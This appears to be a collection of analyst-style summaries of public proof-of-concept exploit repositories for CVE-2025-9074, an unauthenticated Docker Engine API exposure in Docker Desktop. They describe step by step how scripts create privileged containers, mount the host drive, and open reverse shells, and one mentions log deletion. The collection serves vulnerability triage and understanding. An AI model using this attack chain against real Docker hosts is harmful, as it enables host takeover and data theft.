Unauthenticated Docker Engine API Exposure in Docker Desktop

Repository is a small standalone PHP proof-of-concept exploit with 4 files: one executable exploit script (`poc.php`), a README, license, and editor settings. The exploit is not part of a larger framework. The main capability is unauthenticated remote code execution against an exposed Docker Engine API by abusing container management endpoints over HTTP. The script creates a privileged `alpine:latest` container, bind-mounts the host filesystem (`/:/mnt/hostfs` for Linux/macOS or `/mnt/host/c:/mnt/hostfs` for Windows), starts the container, and either executes an attacker-supplied command or launches a reverse shell. In command mode, it polls `/containers/{id}/json` until the container exits, then fetches `/containers/{id}/logs?stdout=1&stderr=1` and demultiplexes Docker’s multiplexed log stream to display output. In reverse-shell mode, it uses a shell one-liner with bash `/dev/tcp`, netcat+FIFO, or a fallback file-descriptor loop, and sets `NetworkMode` to `host`. Optional cleanup stops and deletes the container. The README provides usage examples, target assumptions, and mitigation guidance. Overall, this is an operational exploit POC for exposed unauthenticated Docker APIs, enabling host filesystem access, arbitrary command execution, and reverse-shell compromise.

This repository is a small Bash-based operational PoC centered on a single script, docker_shell.sh, supported by README and policy/license files. The script is not a framework module; it is a standalone interactive wrapper around the Docker Engine REST API. Its purpose is to provide an emulated shell into a Docker container without using the Docker CLI, Python, or jq. Core capability: the script talks directly to an exposed Docker API endpoint at http://192.168.65.7:2375, looks up or creates a container named alpine_escape, bind-mounts the host path /run/desktop/mnt/host/c/ into the container at /mnt, starts the container, and then lets the operator run arbitrary commands via Docker exec. This effectively exposes the host Windows C: drive inside the container and allows command execution against that mounted data. The script also implements its own parser for Docker's multiplexed exec output stream using dd, od, and awk, storing raw output in /tmp/docker_out.bin before decoding it. Repository structure: 5 files total, with one code file (docker_shell.sh) and four documentation/legal files (README.md, ETHICAL_USE.md, NOTICE.md, LICENSE). README.md explains the intended Docker Desktop/WSL2 environment, usage flow, and mount layout. The code file contains all exploit logic: get_container_id() enumerates containers by name; start_container() creates an Alpine container with a host bind mount and starts it; run_cmd() creates and starts exec instances for arbitrary shell commands; status() queries container state. From an exploitation perspective, this is an operational abuse script for an exposed Docker Engine API in Docker Desktop/WSL2-style environments. It is not merely a detector and does not rely on a benign proof-only action; it performs container creation, host-drive mounting, and arbitrary command execution. The claimed CVE is CVE-2025-9074 in the notice, but the code itself is best characterized as a practical Docker API abuse/escape-style PoC targeting misconfigured or exposed Docker Desktop/Engine access rather than containing a memory-corruption exploit.

This repository is a small, self-contained Bash exploit consisting of a README and one executable script, escape.sh. The script targets an exposed, unauthenticated Docker Remote API on TCP/2375 and abuses it to create a privileged Alpine container with the host root filesystem bind-mounted to /mnt/host. After starting the container, it provides an interactive loop that uses Docker exec API calls to run arbitrary shell commands inside that container. Because the container is privileged and has the host filesystem mounted, the exploit effectively grants host-level access and enables container escape in practice. Repository structure is minimal: README.md explains the attack scenario and intended HTB/lab usage, while escape.sh contains the full exploit logic. The script performs the following sequence: POST /containers/create with Privileged=true and Binds ["/:/mnt/host"], POST /containers/<id>/start, then repeatedly POST /containers/<id>/exec and /exec/<id>/start to execute attacker-supplied commands. It also supports a basic local cd handler to maintain a working directory across commands and cleans up by stopping and deleting the container on exit. The exploit is operational rather than a mere proof of concept because it automates end-to-end exploitation and provides an interactive command interface, but it is not highly weaponized: the target endpoint is hardcoded, the image is fixed to alpine, and there is no broader framework integration or payload customization layer.

This repository is a small standalone Go proof-of-concept for CVE-2025-9074 consisting of two files: a Japanese README and a single executable source file, poc.go. It is not part of a larger exploit framework. The README explains the intended scenario: abuse of an unauthenticated Docker Engine remote API to create a privileged container with host bind mounts, primarily demonstrated against a Windows + Docker Desktop style environment. The main exploit logic is in poc.go. The program hardcodes the Docker API target as http://192.168.65.7:2375 and first checks reachability via /version. It then enumerates available images through /images/json, preferring common lightweight images such as alpine, busybox, ubuntu, debian, centos, nginx, and httpd. If no suitable image is found, it attempts to pull alpine:latest using the Docker API /images/create endpoint. After obtaining an image, the PoC proceeds to create a privileged container and bind-mount host filesystem paths into the container, using Windows/Docker Desktop-oriented host path candidates such as /run/desktop/mnt/host/<drive> and /host_mnt/<drive>. The stated goal is to write a marker file onto the host filesystem from inside the container, thereby demonstrating host read/write impact. The code also queries /info to print selected daemon and security-related information, then removes the created container. Operationally, this is more than a detector: it performs the full API abuse chain needed to demonstrate impact. The payload is basic and hardcoded rather than highly modular, so OPERATIONAL is the best fit. The attack vector is network-based access to an exposed Docker daemon, with the resulting capability being effective host filesystem access via privileged container creation and bind mounts. The most important fingerprintable target is the hardcoded Docker API endpoint 192.168.65.7:2375, along with the Docker API paths /version, /images/json, /images/create, /info, and the documented container lifecycle endpoints. The repository’s purpose is educational demonstration of the risk posed by exposing the Docker Engine API without authentication.

This repository is a small standalone Bash exploit consisting of one executable script and a README. The main file, CVE-2025-9074.sh, is a dependency-free exploit that manually speaks HTTP over Bash's /dev/tcp interface to a hardcoded Docker API endpoint at 192.168.65.7:2375. Its purpose is to abuse an exposed Docker Engine API to obtain command execution by creating an Alpine container, bind-mounting the host Windows C: drive from /run/desktop/mnt/host/c/ into /mnt inside the container, starting the container, creating an exec instance, and running an arbitrary user-provided command. Output is read back from the API response and printed to the console, after which the script force-removes the container for cleanup. Repository structure is minimal: README.md briefly explains the concept and usage, while the Bash script contains all exploit logic. Internally, the script builds a JSON command array from CLI arguments, uses a helper to extract object IDs from JSON responses, and implements a send_request function that crafts raw HTTP requests and reads responses directly from the socket. The exploit is operational rather than a mere proof of concept because it performs the full attack chain end-to-end and supports arbitrary command input, but it is not highly weaponized since targeting and payload handling are hardcoded. The primary capability is remote command execution in a container with access to host-mounted files, which can enable browsing, reading, or modifying data on the host C: drive depending on Docker and host permissions.

Repository contains a single shell script (CVE-2025-9074.sh) implementing an operational network exploit against an exposed, unauthenticated Docker Engine Remote API (HTTP). The script takes four parameters: target IP, target API port, attacker callback IP (LHOST), and callback port (LPORT). It first queries the Docker API endpoint /images/json to obtain an existing image tag (first RepoTags entry), then crafts a JSON request to /containers/create that sets Cmd to run /bin/bash -c with a bash reverse shell using /dev/tcp to connect back to the attacker. The container is created with HostConfig.Binds that mount host paths into the container ("/mnt/host/c:" to /host_root_win and "/" to /host_root_nix), enabling access to host filesystems from inside the container. Finally, it POSTs to /containers/{id}/start to execute the payload. Overall purpose: achieve code execution via Docker API and facilitate host compromise/LPE by leveraging privileged host filesystem mounts once the container is running.

This repository contains a single proof-of-concept Bash script (POC-for-CVE-2025-9074.sh) and a license file. The script targets Docker Engine instances with the HTTP API exposed (default port 2375), specifically on Windows hosts. It allows an attacker to read from or write to arbitrary files on the Windows host by abusing Docker's bind mount feature. The script works by converting a Windows file path to a Linux-style path, creating a container with a bind mount to the host directory, and executing a shell command inside the container to perform the file operation. The result is retrieved via the Docker API. The exploit demonstrates the risk of exposing the Docker API without authentication, especially on Windows systems, and provides a clear example of how an attacker could leverage this misconfiguration for arbitrary file access. No detection or fake code is present; this is a functional POC exploit.

This repository contains a Bash exploit script (Fsociety-CVE-2025-9074_v.4.4.sh) targeting CVE-2025-9074, a critical Docker Desktop container escape vulnerability. The script is interactive and user-friendly, prompting the attacker for the target Docker host IP and port (defaulting to 192.168.65.7:2375), and verifying connectivity to the Docker API. It offers two main attack modes: a classic reverse shell and an interactive shell, both leveraging Docker API access to escape the container and gain host-level access, potentially with root privileges. The script also includes features for log deletion to cover tracks. The README provides detailed usage instructions, system requirements, and background on the vulnerability. The codebase is simple, with one main Bash script, a README, and a license file. The exploit is operational, providing real attack functionality rather than just detection or proof-of-concept.

This repository contains a Python exploit tool for CVE-2025-9074, a vulnerability in the Docker Remote API that allows unauthenticated attackers to execute arbitrary commands, create containers with host disk mounts (enabling container escape), and perform file operations on the Docker host. The main script, 'CVE-2025-9074-docker-exploit.py', provides a menu-driven interface for container and image management, command execution (including interactive shells), and host file manipulation via the Docker API. The exploit is operational and automates the attack process, including Windows path normalization for Docker Desktop environments. The default target is 'http://192.168.65.7:2375', but a custom endpoint can be specified. The repository also includes a README with detailed usage instructions and a requirements.txt for dependencies. The attack vector is network-based, requiring access to an exposed Docker API endpoint. No fake or detection-only code is present; this is a functional exploit.

This repository contains a Bash-based proof-of-concept exploit for CVE-2025-9074, a critical vulnerability in Docker Desktop that allows unauthenticated remote code execution via the Docker Engine API (typically exposed on 192.168.65.7:2375). The exploit script (exploit.sh) automates the process of discovering available Docker images, creating a privileged container with the host filesystem mounted, and executing a reverse shell payload to the attacker's specified listener. The exploit requires the attacker to provide a listener IP and port, and it leverages the unauthenticated Docker API to achieve host root access. The repository is minimal, containing only the exploit script and a markdown readme with usage instructions and vulnerability details. No external dependencies are required beyond standard Bash utilities. The attack vector is network-based, targeting exposed Docker APIs, and the endpoints used are the Docker API's image listing, container creation, and container start endpoints.

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-9074, targeting Docker Engine instances with the API exposed over TCP (default port 2375) without authentication. The main exploit script, 'cve-2025-9074.sh', is a Bash script that takes a target IP, port, attacker IP, and listener port as arguments. It first checks if the Docker API is accessible, then crafts a JSON payload to create a privileged Docker container using the 'alpine:latest' image. The container runs a shell command that establishes a reverse shell to the attacker's machine using netcat. The script then starts the container, triggering the reverse shell. The repository structure is simple, containing a license, a README with usage instructions, and the exploit script. The exploit demonstrates the risk of exposing the Docker API without authentication and provides a working reverse shell payload for demonstration and testing purposes.

This repository provides a Bash proof-of-concept exploit for CVE-2025-9074, targeting Docker daemons with their API exposed over TCP (commonly port 2375) without authentication, particularly in environments where the host is a Windows machine. The repository contains two files: a README.md with usage instructions and context, and cve-2025-9074-poc.sh, the main exploit script. The script takes an IP, port, and command as arguments, then uses the Docker API to create a new container with the host's Windows C: drive mounted to /host_root, executes the specified command, retrieves the output, and cleans up the container. The exploit demonstrates how an attacker can leverage an exposed Docker API to gain access to sensitive files or execute arbitrary commands on the host system. The attack vector is network-based, requiring access to the Docker API endpoint. The endpoints used are all HTTP requests to the Docker API for container creation, management, and log retrieval. The exploit is operational and demonstrates real-world impact if the Docker API is left exposed and unprotected.

This repository contains a working exploit for CVE-2025-9074, a critical container escape vulnerability in Docker Desktop (versions < 4.44.3) on Windows and macOS. The exploit leverages unauthenticated access to the Docker Engine API at http://192.168.65.7:2375, which is exposed to containers in vulnerable configurations. The main exploit script (exploit.py) is written in Python and provides three modes: arbitrary command execution, interactive root shell, and reverse shell. It does so by creating a privileged container with the host filesystem mounted at /hostfs, then executing the desired payload. The exploit is operational and provides full host compromise from a container context. The repository is well-documented, with a detailed README explaining the vulnerability, usage instructions, and mitigation steps. No detection-only scripts are present; the code is a functional exploit. The only code file is exploit.py, which is the entry point and contains all exploit logic.

This repository contains a Bash proof-of-concept exploit for CVE-2025-9074, a critical vulnerability in Docker Desktop and Docker Engine where the Docker API is exposed without authentication (commonly on port 2375). The main file, 'cve-2025-9074.sh', is a standalone script that automates the exploitation process. It first checks connectivity to the Docker API, detects the target OS (Linux or Windows), and determines the appropriate mount path for host breakout. The script enumerates available Docker images on the target, creates a new container with the host's root (or C:) mounted, and executes an arbitrary command provided by the user. After execution, it cleans up by deleting the container. The exploit requires no dependencies beyond standard Bash utilities and curl, and is designed to work even on air-gapped systems by using existing images. The README provides usage instructions and describes the exploit's features. The primary attack vector is network-based, targeting exposed Docker APIs, and the exploit enables arbitrary command execution on the host with elevated privileges.

This repository is a proof-of-concept (PoC) exploit for CVE-2025-9074, a misconfiguration vulnerability in Docker where the Remote API is exposed without authentication. The repository contains two files: a README.md with background, usage, and context, and exploit.py, a Python script that interacts with the Docker Remote API. The script allows an attacker to create and start a new container on the target Docker host, execute an arbitrary command (as specified by the user), retrieve the output from the container logs, and optionally clean up (stop and remove) the container. The exploit requires the Docker daemon to be listening on a network-accessible interface (e.g., 0.0.0.0:2375) without TLS or authentication, which is a dangerous misconfiguration. The code is intended for educational and lab use only, as emphasized in the README. The main attack vector is network-based, targeting the Docker API over HTTP. The endpoints used are standard Docker API paths for container management. The exploit is a functional PoC and does not include advanced payloads or automation beyond the described functionality.

This repository provides a proof-of-concept exploit for CVE-2025-9074, a vulnerability in Docker Desktop for Windows where the Docker Engine API is exposed to containers at http://192.168.65.7:2375. The exploit consists of a Python script (cve_2025_9074_poc.py) that, when run from inside a container on a vulnerable host, connects to the Docker Engine API, creates a new container with a bind mount to the Windows C:\ drive, and writes a file (C:\pwn.txt) to the host. The script is configurable via command-line arguments for the target host, port, image, bind paths, and output filename. The repository also includes a Sigma detection rule (sigma.yml) for identifying suspicious access to the Docker Engine API, and a detailed README.md explaining the vulnerability, usage, mitigation, and detection strategies. The main attack vector is network access to the Docker Engine API from within a container, and the exploit demonstrates container-to-host file write via misconfigured Docker API exposure.